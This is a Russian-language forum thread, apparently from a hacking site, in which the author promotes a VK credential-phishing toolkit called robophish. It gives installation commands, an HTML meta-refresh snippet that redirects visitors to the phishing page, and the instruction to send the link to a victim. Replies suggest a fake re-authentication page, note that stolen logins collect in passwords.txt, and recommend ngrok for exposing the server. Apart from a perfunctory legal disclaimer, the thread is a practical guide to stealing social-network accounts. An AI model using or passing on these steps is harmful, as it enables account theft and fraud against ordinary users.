Статья Лучший фишинг для ВК

Привет, это моя первая статья тут, да и думаю последняя.

Использование robophish для атаки целей без предварительного обоюдного согласия является незаконным. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчик не несет ответственности за любое неправильное использование или ущерб, причиненный этой программой.

Предистория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?

В итоге я нашел утилиту shellphish github.com/thelinuxchoice(не реклама)
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом.Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут(не реклама)

на гит хабе установка не слишком понятная, так что я попробую описать все тут. Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.

УСТАНОВКА:
Bash:
1. sudo apt-get install git

2. git clone gasayminajj/robophish

3. cd robophish

4. bash robophish.sh
5. Дальше все интуитивно понятно, нажимаем по ссылке(она оч некрасивая, нужно с ней что-то делать)
6.1 Идем на сайт
6.2 Заходим в HTML редатор.
6.3 Добавляем туда скрипт на переадресацию на наш сайт

HTML:
<head>
<meta http-equiv="refresh" content="1;URL=ссылка" />
</head>
7. Скидываем сайт жертве.

Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )

А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)

68747470733a2f2f73382e686f7374696e676b617274696e6f6b2e636f6d2f75706c6f6164732f696d616765732f32...png
 
Последнее редактирование:
  • Нравится
Реакции: pipcore
Я бы не сказал, что это лучший фишинг, тем более для ВК.
С доменом ладно, хоть что то придумали, но там даже нет проверки на валидность введенных данных.
Было бы ещё лучше, быть там страница где мол при переходе по ссылке выдало какую то ошибку и просят снова авторизоваться "типа" для их же безопасности.
 
  • Нравится
Реакции: Егор Гасай
Я бы не сказал, что это лучший фишинг, тем более для ВК.
С доменом ладно, хоть что то придумали, но там даже нет проверки на валидность введенных данных.
Было бы ещё лучше, быть там страница где мол при переходе по ссылке выдало какую то ошибку и просят снова авторизоваться "типа" для их же безопасности.
Спасибо,обязательно учту ваши пожелания в след. обновлениях.

Забыл дописать, что логин:пароль можно найти в корневой папке программы passwords.txt
 
  • Нравится
Реакции: Lampa
Подскажите какой порт указывать
Любой свободный (8080, 4444 и тп). Главное, что бы твой сервер был доступен из интернета, иначе какой бы ты порт не указал, жертва не сможет к тебе подключится.
Если сервер из интернета не доступен изучи ngrok и дополнительно используй его
 
  • Нравится
Реакции: Егор Гасай
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!